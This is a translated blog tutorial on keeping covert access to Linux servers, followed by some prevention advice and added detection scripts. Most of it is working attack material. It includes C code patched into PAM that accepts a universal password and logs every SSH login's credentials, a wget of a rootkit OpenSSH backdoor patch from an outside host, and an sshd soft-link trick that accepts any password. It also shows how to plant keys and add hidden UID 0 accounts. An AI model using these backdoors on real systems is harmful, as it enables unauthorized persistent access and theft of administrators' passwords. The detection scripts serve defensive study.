Linux persistence: OpenSSH and PAM backdoors, SSH soft links, and public/private key login

1. SSH-PAM backdoor

  PAM (Pluggable Authentication Modules) is an authentication framework. It handles Linux login verification and the authentication of many basic services. Simply put, it is the mechanism through which users are authenticated on Linux systems. When an authentication request arrives, PAM first determines which service is asking, then loads the corresponding PAM configuration file (located in /etc/pam.d), and finally calls the module file (located in /lib/security) that performs the actual check. The PAM backdoor that is easy to exploit works by modifying the authentication logic in the PAM source code so that access can be maintained.

1.1. Overall process

  1. Find out which PAM version the target system uses and download the matching PAM source.
  2. Unpack it, modify the pam_unix_auth.c file, and add a universal password.
  3. Compile PAM.
  4. The compiled module is at modules/pam_unix/.libs/pam_unix.so; copy it to /lib64/security to replace the original. From then on the universal password can be used to log in, and the username and password of every login are recorded in a file.

1.2. Operation demonstration

  CentOS 7.3 is used here. Although the package demonstrated can still be downloaded from GitHub, during actual testing the method did not work.

1.2.1. Check PAM version

  The important point here is that the installed PAM version is 1.1.8, so the matching 1.1.8 version must be used when downloading the PAM source.

setenforce 0    ## put SELinux into permissive mode (the original comment says "turn off the firewall", but setenforce only affects SELinux)
rpm -qa | grep pam

1.2.2. Download the corresponding version

  When downloading, version 1.1.8 is needed here as well. You can also use wget; I kept getting parsing errors, so you can download the archive locally and upload it instead.

https://github.com/linux-pam/linux-pam/releases/tag/Linux-PAM-1_1_8

1.2.2.1. Unzip

tar -zxvf linux-pam-Linux-PAM-1_1_8.tar.gz

1.2.3. Install dependencies

  Mainly the gcc compiler and the flex library need to be installed.

yum install gcc flex flex-devel -y

1.2.4. Modify configuration

  The purpose of modifying the source here is to add the backdoor password and to save the account and password of every SSH login.

vim linux-pam-Linux-PAM-1_1_8/modules/pam_unix/pam_unix_auth.c 

1.2.4.1. Configuration content

  Replace the content at line 179 with the following. The lines must be aligned exactly; if they cannot be aligned, finish the modification locally and upload the file to the target host to replace the original.

/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
if (strcmp("hackers", p) == 0) { return PAM_SUCCESS; }   // backdoor password
if (retval == PAM_SUCCESS) {
    FILE *fp;
    fp = fopen("/tmp/.sshlog", "a");   // where SSH login usernames and passwords are saved
    fprintf(fp, "%s : %s\n", name, p);
    fclose(fp);
}
name = p = NULL;
AUTH_RETURN;

1.2.4.2. Compile and install

  I found that it could not be compiled here, and I do not know why; I only succeeded by swapping in a PAM package that already contained the backdoor. Although this exploitation method still appears on the Internet, many of the articles are several years old, so it may no longer work and may have been fixed.

cd linux-pam-Linux-PAM-1_1_8
./configure && make

1.2.4.3. Backup configuration

  Back up the original pam_unix.so so that logins can be restored if something goes wrong, then copy the new PAM module into the /lib64/security/ directory.

cp /usr/lib64/security/pam_unix.so /tmp/pam_unix.so.bak
cd modules/pam_unix/.libs
cp pam_unix.so /usr/lib64/security/pam_unix.so

1.2.5. Connection test

  You can see that the connection is successful here.

1.2.6. View login password

  Since the password log is a hidden file, you can simply use cat to view it. From now on, whenever the administrator connects over SSH, the password is recorded, and none of this is visible to them. Of course, if the administrator checks regularly, it will still be discovered; these methods persist only because the administrator does not check regularly.

cat /tmp/.sshlog

2. OpenSSH backdoor

  OpenSSH is a free and open source implementation of the SSH (Secure Shell) protocol. Many people mistakenly believe that OpenSSH is related to OpenSSL, but the two projects have different purposes and different development teams. The names are similar only because they share the same goal: providing open source encrypted communication software.

2.1. Principle

  Replace the operating system's own SSH implementation, OpenSSH, with a customized build that records account passwords and accepts a universal password for connections.

2.2. Operation demonstration

  One problem here is that the whole process may fail. It took me three attempts to get this experiment to succeed, and there are still many rough edges in the process that are easy to notice.

  As I said, I tested it several times, so I do not want to write up the rest; I am really speechless.

  Reference article

2.2.1. Install dependencies

  Some dependencies are updated and installed here.

yum -y install openssl openssl-devel pam-devel zlib zlib-devel
yum -y install gcc gcc-c++ make              

2.2.2. Download replacement packages and backdoor files

  You can download the files manually or directly from the server. If the online download fails, download them manually and then upload them.

wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
wget https://mirror.aarnet.edu.au/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz

2.2.2.1. Unzip the package

tar -xzvf openssh-5.9p1.tar.gz
tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz

2.2.3. Install openssh

  If the patch command is reported as missing here, install it with yum.

cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1
cd openssh-5.9p1 && patch < sshbd5.9p1.diff

2.2.3.1. Edit Password

  Just change the value after #define SECRETPW to the password you want.

vim includes.h

2.2.3.2. Installation and compilation

  One thing to note: compilation may not succeed, and sometimes the files cannot even be edited. Many materials on the Internet simply list the commands without mentioning this, so I say it in advance: compilation may fail. If it fails, try again; if it still does not work, give up.

./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 && make && make install

2.2.4. Restart

  Restarting may also cause problems. This experiment is sometimes very strange: sometimes the test succeeds and sometimes it does not.

systemctl restart sshd.service #restart the sshd service
systemctl status sshd.service #check whether sshd started

2.2.5. Test login

  If sshd fails to restart or the previous step failed, local ssh will not be able to connect.

2.2.5.1. Super password test

  Here I test that the super password can be used to log in.

ssh [email protected]

2.2.5.2. View clear text password

cat /tmp/ilog

2.3. Prevention methods

  1. Reinstall the OpenSSH software and update to the latest version, 7.2.
  2. Change the default SSH port 22 to another port.
  3. Add an SSH access policy in iptables.
  4. Check the command history and clean up suspicious files. If conditions permit, rebuild the system.
  5. Change the passwords of all users on the server to new strong passwords.
  6. Use the strace command to find the SSH backdoor.
  7. Run "ps aux | grep sshd" to obtain the PID of the suspicious process, then run "strace -o aa -ff -p PID" to trace it. After an SSH login succeeds, the strace output files are written to the current directory.
  8. Use "grep open aa* | grep -v -e No -e null -e denied | grep WR" to look at the recorded files.
  9. This command filters out error messages, /dev/null and "denied" messages, leaving the files opened in write mode (WR), because the recorded passwords have to be written to a file.
  10. The file the SSH backdoor writes passwords to can therefore be found among the files opened in read-write mode, and this is one way to determine whether an SSH backdoor is present. Of course, there are also cases where no password is recorded and only a universal-password backdoor is left.
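
  The strace check in items 6 to 10, and the pam_unix.so replacement from section 1, are detection work that can be scripted. The following is an added example and not part of the original post: write_opens applies the same filter as the grep pipeline in item 8, verify_packages assumes an RPM-based host such as the CentOS 7 system used above, and the strace lines in sample_strace are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): the strace-based check from
# the prevention list as a reusable filter, plus a package integrity check.

# sample_strace prints constructed lines in the format "strace -o aa -ff -p PID"
# writes, including an error line and a /dev/null line the filter must drop.
sample_strace() {
    cat <<'EOF'
open("/etc/passwd", O_RDONLY|O_CLOEXEC) = 4
open("/dev/null", O_WRONLY) = 5
open("/var/log/wtmp", O_WRONLY|O_APPEND) = 6
open("/root/.ssh/authorized_keys", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/shadow", O_RDONLY) = -1 EACCES (Permission denied)
open("/tmp/ilog", O_WRONLY|O_CREAT|O_APPEND, 0666) = 7
openat(AT_FDCWD, "/tmp/.sshlog", O_WRONLY|O_CREAT|O_APPEND, 0666) = 8
EOF
}

# write_opens: print the paths a traced sshd opened for writing.
# Reads strace output from the files given as arguments (aa.* after
# "strace -o aa -ff") or from stdin when no file is given. Same idea as
# grep open | grep -v -e No -e null -e denied | grep WR, but it also
# requires a successful return value and prints only the path.
write_opens() {
    awk '
        /^open(at)?\(/ && / = [0-9]+$/ && /O_WRONLY|O_RDWR/ {
            split($0, part, "\"")              # part[2] is the quoted path
            if (part[2] != "/dev/null") print part[2]
        }' "$@"
}

# verify_packages: on an RPM system, report files of the PAM and OpenSSH
# packages whose size, digest or mode no longer match the package database.
# A replaced pam_unix.so or sshd shows up with "S" (size) and "5" (digest)
# flags. Returns non-zero if anything differs.
verify_packages() {
    rpm -V pam openssh-server
}

if [ "${1-}" = "--demo" ]; then
    # usage: sh check_sshd_writes.sh --demo
    sample_strace | write_opens
fi
```

  On the constructed sample the filter prints /var/log/wtmp, /tmp/ilog and /tmp/.sshlog; the first is a normal login record, the other two are the locations the backdoors above write to, which is why the paths still need a human look. Run write_opens on the real aa.* files after reproducing a login, as item 7 describes.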

3. SSH soft link

  Provided that PAM authentication is enabled in the sshd configuration and the control flag in the relevant PAM configuration file is sufficient, authentication succeeds as soon as the pam_rootok module sees that the uid is 0 (root). PAM chooses which file in /etc/pam.d to load by the service name, which here is the name of the soft link.

3.1. Operation demonstration

  This backdoor only accepts connections while the server stays powered on; after a shutdown it cannot be used again.

3.1.1. Check whether pam authentication is enabled

  If this shows no, you can edit the configuration file directly, but root permissions are required.

cat /etc/ssh/sshd_config|grep UsePAM

3.1.2. Establishing soft connections

  After creating the soft link, the firewall port has to be opened. If the firewall is off, this step does not matter.

ln -sf /usr/sbin/sshd /tmp/su ;/tmp/su -oPort=9999
#start sshd through the soft link, listening on port 9999

firewall-cmd --add-port=9999/tcp --permanent
#open the firewall rule, otherwise the connection fails

firewall-cmd --reload
#reload the firewall service

firewall-cmd --query-port=9999/tcp
#check whether port 9999 is allowed; "yes" means it is open

3.1.3. Testing

  The 9999 here is the port. Enter any password and you can log in.

ssh [email protected] -p 9999   ##the value after -p is the port
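
  As an added example (not from the original post), the two conditions this trick depends on, an sshd running under another name and a PAM service file that lets uid 0 through with a sufficient pam_rootok.so, can both be checked from the administrator's side. The function names, the proc_table line format and the sample process lines are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original post): find an sshd started under
# another name, and list the PAM services whose auth stack accepts uid 0.
# Process data comes from /proc (proc_table) or from constructed sample
# lines (sample_procs) for testing.

# proc_table prints one line per process: PID, the real executable (the
# resolved /proc/PID/exe link) and the command line as the process sees it.
# Reading the exe links of other users' processes requires root.
proc_table() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        cmd=$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null)
        printf '%s %s %s\n' "${p#/proc/}" "$exe" "$cmd"
    done
}

# sample_procs: constructed output in the same format, with a normal sshd
# and one started through a soft link named /tmp/su on port 9999.
sample_procs() {
    cat <<'EOF'
1 /usr/lib/systemd/systemd /usr/lib/systemd/systemd --switched-root --system
1234 /usr/sbin/sshd /usr/sbin/sshd -D
4321 /usr/sbin/sshd /tmp/su -oPort=9999
5678 /usr/bin/bash -bash
EOF
}

# renamed_sshd: read proc_table lines on stdin and print "PID argv0" for
# every process whose executable is sshd but whose argv[0] is not the
# normal path. A soft link shows up here because /proc/PID/exe follows the
# link to the real binary while argv[0] keeps the link name.
renamed_sshd() {
    awk '$2 ~ /\/sshd$/ && $3 != "/usr/sbin/sshd" { print $1, $3 }'
}

# pam_rootok_sufficient DIR: list PAM service files (DIR defaults to
# /etc/pam.d) whose auth stack accepts uid 0 through pam_rootok.so with the
# "sufficient" control flag. These are the services that let root in without
# a password, so they are the ones to audit alongside UsePAM in sshd_config.
pam_rootok_sufficient() {
    dir=${1:-/etc/pam.d}
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if grep -Eq '^[[:space:]]*auth[[:space:]]+sufficient[[:space:]]+pam_rootok\.so' "$f"; then
            basename "$f"
        fi
    done
}

if [ "${1-}" = "--scan" ]; then
    # usage (as root): sh find_renamed_sshd.sh --scan
    echo "== sshd processes not started as /usr/sbin/sshd =="
    proc_table | renamed_sshd
    echo "== PAM services with a sufficient pam_rootok.so =="
    pam_rootok_sufficient
fi
```

  On the sample data renamed_sshd reports only PID 4321 with argv[0] /tmp/su. On a real host, a listener on an unexpected port (ss -tlnp) is the other place the same process becomes visible.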

4. Public and private keys

  Principle: Use a key generator to create a pair of keys, namely a public key and a private key. Add the public key to an account on the server, and then use the private key on the client to complete authentication and log in.

4.1. Operation demonstration

  The whole process is to generate a key on a local Linux server, then upload the public key to the target host, and then use the local computer to connect to the target host to achieve a password-free connection.

  But there is also a shortcoming: it is too easy to discover.

4.1.1. Enable key authentication

  A command may be missing here; just enter it when needed. Note that both the attacking machine and the target machine need this verification enabled.

vim /etc/ssh/sshd_config

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys

4.1.2. Attack machine generation

  The attacking machine is used to generate the key pair.

ssh-keygen -t rsa #press Enter three times
id_rsa : private key
id_rsa.pub : public key

4.1.3. Upload to target host

  Copy the contents of the attacking machine's public key into authorized_keys on the target host. If the file does not exist there, create it.

/root/.ssh/authorized_keys

4.1.4. Login test

  If you log in now, no password is requested; key verification has already taken place when Kali connects to the target host.

ssh [email protected]

5. Backdoor accounts

  A backdoor account is also easy to discover unless the server is never inspected. With regular administrator inspection or fairly strict settings, it usually cannot be kept for long.

5.1. Method 1

  Add the account test1 with uid 0 and password 123456.

useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G root -s /bin/bash -d /home/test1

5.1.1. Testing

ssh [email protected]

5.2. Method 2

echo "test2:x:0:0::/:/bin/sh" >> /etc/passwd #add a superuser account
passwd test2 #set the password of test2 to 123456

5.2.1. Testing

ssh [email protected]
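
  Added example, not from the original post: an audit that lists the extra UID 0 accounts both methods leave behind and the authorized_keys files that section 4 relies on. The names sample_passwd, extra_uid0 and authorized_keys_report are chosen here, and the passwd lines and key lines are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): account and key audit.
# passwd content is read from stdin so the same functions run on
# /etc/passwd or on the constructed sample below.

# sample_passwd DIR: constructed /etc/passwd content. DIR is used as root's
# home so a test can place an authorized_keys file under it. test1 is what
# "useradd -o -u 0" leaves behind, test2 is the hand-appended line.
sample_passwd() {
    cat <<EOF
root:x:0:0:root:$1/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
test1:x:0:0::/home/test1:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
test2:x:0:0::/:/bin/sh
EOF
}

# extra_uid0: print every account other than root whose UID is 0.
# "useradd -o" only suppresses the uniqueness check; the duplicate UID is
# still right there in the third field.
extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# authorized_keys_report: for each account whose home holds
# .ssh/authorized_keys, print "user file key_count". Lines carrying a key,
# with or without leading options such as command="...", are counted;
# comments and blank lines are not. Compare counts and file mtimes against
# what is expected for the host.
authorized_keys_report() {
    while IFS=: read -r user _ _ _ _ home _; do
        f="$home/.ssh/authorized_keys"
        [ -f "$f" ] || continue
        n=$(grep -Ec '(^|[[:space:]])(ssh-|ecdsa-|sk-)[^[:space:]]+[[:space:]]+AAAA' "$f" || true)
        printf '%s %s %s\n' "$user" "$f" "$n"
    done
}

if [ "${1-}" = "--audit" ]; then
    # usage (as root): sh audit_accounts.sh --audit
    echo "== UID 0 accounts other than root =="
    extra_uid0 < /etc/passwd
    echo "== authorized_keys files =="
    authorized_keys_report < /etc/passwd
fi
```

  Against the sample, extra_uid0 prints test1 and test2. Any account this lists on a real system, and any authorized_keys entry the owner cannot account for, should be removed, after which the password changes from section 2.3 still apply because the credentials may already have been recorded.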

Origin blog.csdn.net/weixin_44268918/article/details/132425901